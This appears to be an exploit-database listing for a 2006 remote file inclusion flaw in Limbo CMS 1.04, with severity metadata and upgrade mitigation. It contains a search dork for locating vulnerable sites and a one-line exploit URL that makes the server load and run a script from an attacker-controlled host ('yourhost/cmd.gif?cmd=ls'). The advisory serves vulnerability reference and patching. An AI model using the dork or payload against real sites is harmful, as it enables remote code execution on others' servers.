header-logo
Suggest Exploit
vendor:
Limbo CMS
by:
[Oo]
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Limbo CMS
Affected Version From: 1.04
Affected Version To: 1.04
Patch Exists: YES
Related CWE: N/A
CPE: a:limbo-cms:limbo_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Limbo CMS <= 1.04 Remote File Inclusion

A vulnerability in Limbo CMS <= 1.04 allows remote attackers to execute arbitrary PHP code via a URL in the classes_dir parameter to classes/adodbt/sql.php.

Mitigation:

Upgrade to Limbo CMS version 1.05 or later.
Source

Exploit-DB raw data:

Title: Limbo CMS <= 1.04 Remote File Inclusion
URL: http://www.limbo-cms.com/
Dork: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
Credits: [Oo]

Exploit: /classes/adodbt/sql.php?classes_dir=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-04-29]

Navigation

Suggest Exploit

Services By CQR